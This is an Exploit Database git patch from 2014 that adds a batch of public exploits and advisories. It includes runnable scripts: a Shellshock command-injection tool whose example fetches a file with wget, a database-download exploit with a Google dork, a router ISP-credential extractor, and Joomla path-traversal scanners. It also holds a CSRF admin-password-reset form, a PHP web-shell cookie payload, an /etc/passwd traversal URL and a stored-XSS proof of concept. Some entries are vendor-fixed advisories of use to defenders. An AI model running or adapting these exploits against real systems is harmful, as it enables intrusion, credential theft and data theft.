From dd094ab0a76463634846e354a0e01a38614a51cc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 26 Sep 2014 04:44:01 +0000
Subject: [PATCH] Updated 09_26_2014

---
 files.csv                           |  19 ++-
 platforms/asp/webapps/34753.py      |  80 +++++++++
 platforms/hardware/webapps/34751.pl |  46 +++++
 platforms/linux/remote/34765.txt    |  15 ++
 platforms/linux/remote/34766.php    |  45 +++++
 platforms/php/webapps/34637.txt     |   2 +-
 platforms/php/webapps/34718.txt     |  24 +++
 platforms/php/webapps/34754.py      | 114 +++++++++++++
 platforms/php/webapps/34755.py      | 112 +++++++++++++
 platforms/php/webapps/34758.txt     |  84 ++++++++++
 platforms/php/webapps/34759.txt     |  54 ++++++
 platforms/php/webapps/34760.txt     |  29 ++++
 platforms/php/webapps/34761.txt     |  55 ++++++
 platforms/php/webapps/34762.txt     |  52 ++++++
 platforms/php/webapps/34763.txt     |  49 ++++++
 platforms/php/webapps/34764.txt     | 249 ++++++++++++++++++++++++++++
 platforms/windows/dos/34752.c       |  49 ++++++
 platforms/windows/remote/34756.rb   | 121 ++++++++++++++
 platforms/windows/remote/34757.rb   | 163 ++++++++++++++++++
 19 files changed, 1360 insertions(+), 2 deletions(-)
 create mode 100755 platforms/asp/webapps/34753.py
 create mode 100755 platforms/hardware/webapps/34751.pl
 create mode 100755 platforms/linux/remote/34765.txt
 create mode 100755 platforms/linux/remote/34766.php
 create mode 100755 platforms/php/webapps/34718.txt
 create mode 100755 platforms/php/webapps/34754.py
 create mode 100755 platforms/php/webapps/34755.py
 create mode 100755 platforms/php/webapps/34758.txt
 create mode 100755 platforms/php/webapps/34759.txt
 create mode 100755 platforms/php/webapps/34760.txt
 create mode 100755 platforms/php/webapps/34761.txt
 create mode 100755 platforms/php/webapps/34762.txt
 create mode 100755 platforms/php/webapps/34763.txt
 create mode 100755 platforms/php/webapps/34764.txt
 create mode 100755 platforms/windows/dos/34752.c
 create mode 100755 platforms/windows/remote/34756.rb
 create mode 100755 platforms/windows/remote/34757.rb

diff --git a/files.csv b/files.csv
index ef3337a2f..7dd2e6906 100755
--- a/files.csv
+++ b/files.csv
@@ -31188,7 +31188,7 @@ id,file,description,date,author,platform,type,port
 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
-34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 4.3 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
+34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
@@ -31261,6 +31261,7 @@ id,file,description,date,author,platform,type,port
 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
@@ -31284,3 +31285,19 @@ id,file,description,date,author,platform,type,port
 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0
 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
+34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
+34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
+34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
+34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
+34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
+34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,metasploit,windows,remote,3000
+34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,metasploit,windows,remote,0
+34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80
+34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80
+34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80
+34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
+34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
+34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
+34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
+34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
+34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
diff --git a/platforms/asp/webapps/34753.py b/platforms/asp/webapps/34753.py
new file mode 100755
index 000000000..8c7e43699
--- /dev/null
+++ b/platforms/asp/webapps/34753.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python
+#-*- coding:cp1254 -*-
+
+# Title        : Onlineon E-Ticaret Database Disclosure Exploit (.py)
+# dork         : inurl:"default.asp?git=sepet"
+# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
+# Home         : http://milw00rm.com / its online
+# Download     : http://www.onlineonweb.com/eticaret.html
+# Demo         : http://ayvalikkokluzeytincilik.com
+# date         : 06/09/2014
+# Python       : V 2.7
+# Thks         : exploit-db.com and others
+
+  
+import sys, urllib2, re, os, time
+  
+def indiriyoruz(url):
+      
+    import urllib
+    aldosyayi = urllib.urlopen(url)
+    indiraq = open(url.split('/')[-1], 'wb')
+    indiraq.write(aldosyayi.read())
+    aldosyayi.close()
+    indiraq.close()
+  
+if len(sys.argv) < 2:
+    os.system(['clear','cls'][1])
+    print " ____________________________________________________________________"
+    print "|                                                                    |"
+    print "|   Onlineon E-Ticaret Database Disclosure Exploit (.py)             |"
+    print "|   ZoRLu / milw00rm.com                                             |"
+    print "|   exploit.py http://site.com/path/                                 |"
+    print "|____________________________________________________________________|"
+    sys.exit(1)
+  
+''' link kontrol 1 '''
+                      
+koybasina = "http://"
+koykicina = "/"
+sitemiz = sys.argv[1]
+
+if sitemiz[-1:] != koykicina:
+    sitemiz += koykicina
+      
+if sitemiz[:7]  != koybasina:
+    sitemiz =  koybasina + sitemiz
+  
+
+database = "db/urun.mdb"
+url2 = sitemiz + database
+print 	"\n" + url2
+print "\nlink check"
+time.sleep(1)
+  
+''' link kontrol 2 '''
+  
+try:
+    adreskontrol = urllib2.urlopen(url2).read()
+      
+    if len(adreskontrol) > 0:
+                                          
+        print "\nGood Job Bro!"
+      
+except urllib2.HTTPError:
+        import os
+        import sys
+        print "\nForbidden Err0r, Security!"
+        sys.exit(1)
+      
+  
+''' dosya indiriliyor '''
+  
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) == 2:
+        print "\nFile is Downloading\n"
+        try:
+            indiriyoruz(url2)
+        except IOError:
+            print '\nFilename not found.'
\ No newline at end of file
diff --git a/platforms/hardware/webapps/34751.pl b/platforms/hardware/webapps/34751.pl
new file mode 100755
index 000000000..8f5f8542f
--- /dev/null
+++ b/platforms/hardware/webapps/34751.pl
@@ -0,0 +1,46 @@
+#!/usr/bin/perl 
+# Exploit Author: Sebastián Magof 
+# Hardware: ZyXEL Prestig P-660HNU-T1
+# Vulnerable file: wzADSL.asp
+# location: http://gateway/cgi-bin/wzADSL.asp
+# Bug: ISP usr+pwd disclosure 
+# Type: Local 
+# Date: 22/09/2014
+# Vendor Homepage: http://www.zyxel.com/
+# Version: 2.00(AAIJ.1)
+# Tested on: Linux Fedora 20/Windows 7
+# (\/)
+# (**) Alpha (:
+#(")(")
+#usage:perl exploit.pl
+use LWP::UserAgent;
+use HTTP::Request;
+#begin
+print "\n\n************************************************************\n";
+print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd     *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) 
+print "************************************************************\n\n";#in oher country modify $url line 25
+
+ 
+#isp pwd disclosure file
+my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
+  
+ 
+#UserAgent
+my $ua = LWP::UserAgent->new();
+$ua->agent("Mozilla/5.0");
+  
+ 
+#Request.
+my $req = HTTP::Request->new(GET => $url);
+my $request = $ua->request($req);
+my $content = $request->content(); #content
+my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
+my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
+#ISP usr+pwd Arnet Telecom Argentina;
+print "User: $usr\n";
+print "Password: $pwd\n\n";
+exit(0);
+ 
+ 
+ 
+__EOF__
\ No newline at end of file
diff --git a/platforms/linux/remote/34765.txt b/platforms/linux/remote/34765.txt
new file mode 100755
index 000000000..89ffa85cd
--- /dev/null
+++ b/platforms/linux/remote/34765.txt
@@ -0,0 +1,15 @@
+Exploit Database Note:
+The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
+
+Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
+
+$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
+ vulnerable
+ this is a test
+
+The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:
+
+ $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
+ bash: warning: x: ignoring function definition attempt
+ bash: error importing function definition for `x'
+ this is a test
\ No newline at end of file
diff --git a/platforms/linux/remote/34766.php b/platforms/linux/remote/34766.php
new file mode 100755
index 000000000..a08bfb636
--- /dev/null
+++ b/platforms/linux/remote/34766.php
@@ -0,0 +1,45 @@
+<?php
+/*
+Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
+CVE: 2014-6271
+Vendor Homepage: https://www.gnu.org/software/bash/
+Author: Prakhar Prasad && Subho Halder
+Author Homepage: https://prakharprasad.com && https://appknox.com
+Date: September 25th 2014
+Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
+	   GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
+Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
+	   Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
+Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
+
+Test CGI Code : #!/bin/bash
+		echo "Content-type: text/html"
+		echo ""
+		echo "Bash-is-Vulnerable"
+
+*/
+error_reporting(0);
+if(!defined('STDIN')) die("Please run it through command-line!\n");
+$x  = getopt("u:c:");
+if(!isset($x['u']) || !isset($x['c']))
+{
+die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
+
+}
+$url = $x['u'];
+$cmd = $x['c'];
+
+	$context = stream_context_create(
+		array(
+			'http' => array(
+				'method'  => 'GET',
+				'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
+			)
+		)
+	);
+	
+	if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
+	die("Command sent to the server!\n");
+	else
+	die("Connection Error\n");
+?>
diff --git a/platforms/php/webapps/34637.txt b/platforms/php/webapps/34637.txt
index 593bf3868..c0d0f9de2 100755
--- a/platforms/php/webapps/34637.txt
+++ b/platforms/php/webapps/34637.txt
@@ -1,6 +1,6 @@
 ######################
 
-# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
+# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection
 
 # Exploit Author : Claudio Viviani
 
diff --git a/platforms/php/webapps/34718.txt b/platforms/php/webapps/34718.txt
new file mode 100755
index 000000000..cb39b903c
--- /dev/null
+++ b/platforms/php/webapps/34718.txt
@@ -0,0 +1,24 @@
+Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at 
+openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014 
+Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1. 
+About the application ------------------------ Easy, proactive 
+monitoring of Unix systems, network and cloud services. Conduct 
+automatic maintenance and recovery and execute meaningful causal actions 
+in error situations M/Monit expand on Monit's capabilities and provides 
+monitoring and management of all your Monit enabled hosts via a modern, 
+clean and well designed user interface which also works on mobile 
+devices. 2. Vulnerabilities Descriptions: ----------------------------- 
+It was found that M/Monit latest version is vulnerable to CSRF attacks. 
+it is possible to reset the password of any user account (admin/regular) 
+on the system without needing to know the current set password for the 
+attacked account. 3. Proof of concept exploit 
+---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div 
+align="center"> <pre> <h2><b> 		 CSRF PoC for M/monit 			<b></h2> <body> 
+<form action="http://mmonit_server:8080/admin/users/update" 
+method="POST"> <input type="hidden" name="fullname" 
+value="Administrator" /> <input type="hidden" name="password" 
+value="Attacker_Passw0rd" /> <input type="hidden" name="email" 
+value="attacker@email.com" /> <input type="hidden" name="admin" 
+value="on" /> <input type="hidden" name="uname" value="admin" /> <input 
+type="submit" name="submit" value="Attack" /> 	</form> 	</body> </div> 
+</html>
\ No newline at end of file
diff --git a/platforms/php/webapps/34754.py b/platforms/php/webapps/34754.py
new file mode 100755
index 000000000..f06322a4e
--- /dev/null
+++ b/platforms/php/webapps/34754.py
@@ -0,0 +1,114 @@
+######################
+
+# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : https://www.apptha.com
+
+# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150
+
+# Dork Google: inurl:option=com_facegallery
+
+# Date : 2014-09-17
+
+# Tested on : Windows 7 / Mozilla Firefox
+#             Linux / Mozilla Firefox
+
+# Info:
+
+# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities
+
+# PoC Exploit:
+#
+# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
+# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]
+
+# "aid" and img_name variables are not sanitized.
+
+######################
+
+# Arbitrary file download exploit:
+
+#!/usr/bin/env python
+
+# http connection
+import urllib, urllib2
+# Args management
+import optparse
+# Error managemen
+import sys
+
+banner = """
+   __                      __           _______
+  |__.-----.-----.--------|  .---.-.   |   _   .---.-.----.-----.
+  |  |  _  |  _  |        |  |  _  |   |.  1___|  _  |  __|  -__|
+  |  |_____|_____|__|__|__|__|___._|   |.  __) |___._|____|_____|
+ |___|                                 |:  |
+                                       |::.|
+                                       `---'
+  _______       __ __                      _____    _______
+ |   _   .---.-|  |  .-----.----.--.--.   | _   |  |   _   |
+ |.  |___|  _  |  |  |  -__|   _|  |  |   |.|   |__|.  |   |
+ |.  |   |___._|__|__|_____|__| |___  |   `-|.  |__|.  |   |
+ |:  1   |                      |_____|     |:  |  |:  1   |
+ |::.. . |                                  |::.|  |::.. . |
+ `-------'                                  `---'  `-------'
+
+                               j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d
+
+                        Written by:
+
+                      Claudio Viviani
+
+                   http://www.homelab.it
+
+                      info@homelab.it
+                  homelabit@protonmail.ch
+
+             https://www.facebook.com/homelabit
+                https://twitter.com/homelabit
+             https://plus.google.com/+HomelabIt1/
+   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+def connection(url,pathtrav):
+    try:
+        response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
+        content = response.read()
+        if content != "":
+            print '[!] VULNERABLE'
+            print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
+        else:
+            print '[X] Not Vulnerable'
+    except urllib2.HTTPError:
+        print '[X] HTTP Error'
+    except urllib2.URLError:
+        print '[X] Connection Error'
+
+commandList = optparse.OptionParser('usage: %prog -t URL')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+print(banner)
+
+url = checkurl(options.target)
+pathtrav = "../../"
+
+connection(url,pathtrav)
diff --git a/platforms/php/webapps/34755.py b/platforms/php/webapps/34755.py
new file mode 100755
index 000000000..93381dab7
--- /dev/null
+++ b/platforms/php/webapps/34755.py
@@ -0,0 +1,112 @@
+######################
+
+# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : https://www.apptha.com
+
+# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
+
+# Dork Google: inurl:option=com_macgallery
+
+# Date : 2014-09-17
+
+# Tested on : Windows 7 / Mozilla Firefox
+
+#             Linux / Mozilla Firefox
+
+# Info:
+
+# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
+
+# PoC Exploit:
+
+#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
+
+#"album_id" variable is not sanitized.
+
+######################
+
+#!/usr/bin/env python
+
+# http connection
+import urllib, urllib2
+# Args management
+import optparse
+# Error managemen
+import sys
+
+banner = """
+   __                      __           ___ ___
+  |__.-----.-----.--------|  .---.-.   |   Y   .---.-.----.
+  |  |  _  |  _  |        |  |  _  |   |.      |  _  |  __|
+  |  |_____|_____|__|__|__|__|___._|   |. \_/  |___._|____|
+ |___|                                 |:  |   |
+                                       |::.|:. |
+                                       `--- ---'
+  _______       __ __                      _____    _______
+ |   _   .---.-|  |  .-----.----.--.--.   | _   |  |   _   |
+ |.  |___|  _  |  |  |  -__|   _|  |  |   |.|   |__|   1___|
+ |.  |   |___._|__|__|_____|__| |___  |   `-|.  |__|____   |
+ |:  1   |                      |_____|     |:  |  |:  1   |
+ |::.. . |                                  |::.|  |::.. . |
+ `-------'                                  `---'  `-------'
+
+                            j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
+
+                        Written by:
+
+                      Claudio Viviani
+
+                   http://www.homelab.it
+
+                      info@homelab.it
+                  homelabit@protonmail.ch
+
+             https://www.facebook.com/homelabit
+                https://twitter.com/homelabit
+             https://plus.google.com/+HomelabIt1/
+   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+def connection(url,pathtrav):
+    try:
+        response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
+        content = response.read()
+        if content != "":
+            print '[!] VULNERABLE'
+            print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
+        else:
+            print '[X] Not Vulnerable'
+    except urllib2.HTTPError:
+        print '[X] HTTP Error'
+    except urllib2.URLError:
+        print '[X] Connection Error'
+
+commandList = optparse.OptionParser('usage: %prog -t URL')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+print(banner)
+
+url = checkurl(options.target)
+pathtrav = "../../"
+
+connection(url,pathtrav)
diff --git a/platforms/php/webapps/34758.txt b/platforms/php/webapps/34758.txt
new file mode 100755
index 000000000..657f0c994
--- /dev/null
+++ b/platforms/php/webapps/34758.txt
@@ -0,0 +1,84 @@
+------------------------------------------------------------------------
+Glype proxy cookie jar path traversal allows code execution
+------------------------------------------------------------------------
+Securify, September 2014
+
+------------------------------------------------------------------------
+Abstract
+------------------------------------------------------------------------
+A path traversal vulnerability has been identified in the Glype
+web-based proxy that allows an attacker to run arbitrary PHP code on the
+server or to remove critical files from the filesystem. This only
+affects servers that are configured to:
+
+- store Glype cookies locally; AND
+- disable PHP display_errors; AND
+- allow the webserver process to write to the filesystem (document
+root).
+
+------------------------------------------------------------------------
+Affected versions
+------------------------------------------------------------------------
+This issue has been identified in Glype 1.4.9. Older version are most
+likely affected as well.
+
+------------------------------------------------------------------------
+Fix
+------------------------------------------------------------------------
+Glype was informed and a fixed version (1.4.10) is now available at
+www.glype.com
+
+------------------------------------------------------------------------
+Details
+------------------------------------------------------------------------
+http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html 
+
+File creation via path traversal
+
+When the "Store cookies on server" option is set in admin.php, Glype will create a cookie jar on the server to store a user's cookies. The filename for the cookie jar is created using the user's session ID.
+
+browse.php
+
+$toSet[CURLOPT_COOKIEFILE] = $toSet[CURLOPT_COOKIEJAR] = $CONFIG['cookies_folder'] . session_id();
+PHP takes this session ID from a cookie, so the value returned by session_id() is under control of the user. By using path traversal a user can overwrite or create any file on the server with the rights of the webserver's system user.
+
+Code execution
+
+As a POC the following steps were taken to create and run a malicious PHP file in the webroot:
+
+1. Glype was installed with the "Store cookies on server" option set in admin.php. The cookie directory remained default (tmp/cookies/).
+2. A request was initiated with the Glype session cookie's value set to "../../test.php".
+3. The Glype proxy was used to surf to a Securify controlled domain that returned a header that set a cookie containing a malicious PHP script.
+
+Set-Cookie: TestCookie=<?php echo shell_exec($_GET['cmd']) ?>; expires=Thu, 31-Aug-2014 19:14:10 GMT
+
+This caused Glype to write this PHP backdoor to test.php in the webroot. When requested using a browser, PHP parses the cookie jar file containing the malicious PHP code.
+
+The following Python code can be used as a simple test to verify if your Glype installation is affected:
+
+import urllib2
+
+server = 'http://<glype server>'
+url = '/browse.php?u=http%3A%2F%2Fwww.glype.com&b=28'
+
+req = urllib2.Request(server + url)
+req.add_header('Referer', server)
+req.add_header('Cookie', 's=../securify')
+r = urllib2.urlopen(req)
+
+You are affected if a file named "securify" is created outside of the cookie directory.
+
+Arbitrary file removal
+
+The following code is affected by a (similar) path traversal vulnerability allowing an attacker to remove any file the HTTP process has access to:
+
+includes/process.php
+
+# Look for cookie file and check writable
+if ( is_writable($file = $CONFIG['cookies_folder'] . session_id()) ) {
+
+   # Delete it
+   unlink($file);
+}
+
+This can for example be exploited to put a Glype server out of service or to clear log files.
\ No newline at end of file
diff --git a/platforms/php/webapps/34759.txt b/platforms/php/webapps/34759.txt
new file mode 100755
index 000000000..fa5323bb0
--- /dev/null
+++ b/platforms/php/webapps/34759.txt
@@ -0,0 +1,54 @@
+------------------------------------------------------------------------
+Glype proxy local address filter bypass
+------------------------------------------------------------------------
+Securify, September 2014
+
+------------------------------------------------------------------------
+Abstract
+------------------------------------------------------------------------
+A vulnerability has been identified in the Glype web-based proxy. Glype
+has a filter to disallow users from surfing to local addresses, to
+prevents users from attacking the local server/network Glype is running
+on. The filter can easily be bypassed by using IPs in decimal form.
+
+------------------------------------------------------------------------
+Affected versions
+------------------------------------------------------------------------
+This issue has been identified in Glype 1.4.9. Older version are most
+likely affected as well.
+
+------------------------------------------------------------------------
+Fix
+------------------------------------------------------------------------
+Glype was informed and a fixed version (1.4.10) is now available at
+www.glype.com
+
+------------------------------------------------------------------------
+Details
+------------------------------------------------------------------------
+http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
+
+Glype local address bypass
+
+Glype uses the following code (regex) to filter out internal/local addresses. This is intended to prevent proxy users from attacking local/internal resources through Glype.
+
+browse.php
+# Protect LAN from access through proxy (protected addresses copied from PHProxy)
+if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
+   error('banned_site', $URL['host']);
+}
+
+This regex can easily be bypassed by using a decimal format IP address, which allows an attacker to browse/attack the internal server/network Glype is running on.
+
+For example, if a server running Glype also runs phpmyadmin or another admin panel on local host, browsing to http://2130706433/phpmyadmin (2130706433 equals 127.0.0.1 in decimal) causes Glype to create a local connection to phpmyadmin, allowing remote access. Other internal web pages running on the internal network could be accessed like this as well.
+
+Possible fix
+
+Resolving the hostname using PHP’s gethostbyname before using the regular expression will eliminate this bypass.
+
+$URL['host'] = gethostbyname($URL['host’]);
+
+# Protect LAN from access through proxy (protected addresses copied from PHProxy)
+if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
+   error('banned_site', $URL['host']);
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/34760.txt b/platforms/php/webapps/34760.txt
new file mode 100755
index 000000000..ca68c94f1
--- /dev/null
+++ b/platforms/php/webapps/34760.txt
@@ -0,0 +1,29 @@
+Title:     Pizza Inn Registration Stored XSS
+Severity:   High
+CVE-ID:   CVE-2014-6619
+Release Date:  20 September 2014 
+Author:   Kenneth F. Belva
+Websites:  http://silverbackventuresllc.com
+    http://xssWarrior.com 
+    http://securitymaverick.com
+Twitter:   @infosecmaverick
+Contact:  Please use website contact form.
+Mail: 
+URL:     http://sourceforge.net/projects/restaurantmis/
+Vendor: 
+Remote Exploit:  Yes
+
+Discovered with: xssWarrior - http://xssWarrior.com
+
+
+Description:
+============
+
+On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
+
+
+Proof of Concept :
+==================
+
+http://[domain]/PizzaInn/register-exec.php
+fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
diff --git a/platforms/php/webapps/34761.txt b/platforms/php/webapps/34761.txt
new file mode 100755
index 000000000..a964579ff
--- /dev/null
+++ b/platforms/php/webapps/34761.txt
@@ -0,0 +1,55 @@
+Advisory ID: HTB23227
+Product: webEdition
+Vendor: webEdition e.V.
+Vulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985)  and probably prior
+Tested Version: 6.3.8.0 (SVN-Revision: 6985) 
+Advisory Publication:  August 6, 2014  [without technical details]
+Vendor Notification: August 6, 2014 
+Vendor Patch: September 4, 2014 
+Public Disclosure: September 17, 2014 
+Vulnerability Type: Path Traversal [CWE-22]
+CVE Reference: CVE-2014-5258
+Risk Level: Medium 
+CVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.
+
+
+1) Path Traversal in webEdition: CVE-2014-5258
+
+The vulnerability exists due to insufficient sanitization of the "file" HTTP GET parameter in "/webEdition/showTempFile.php" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. "../") and read contents of arbitrary files on the target system with privileges of the web server.
+
+The exploitation example below display contents of "/etc/passwd" file:
+
+http://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd
+
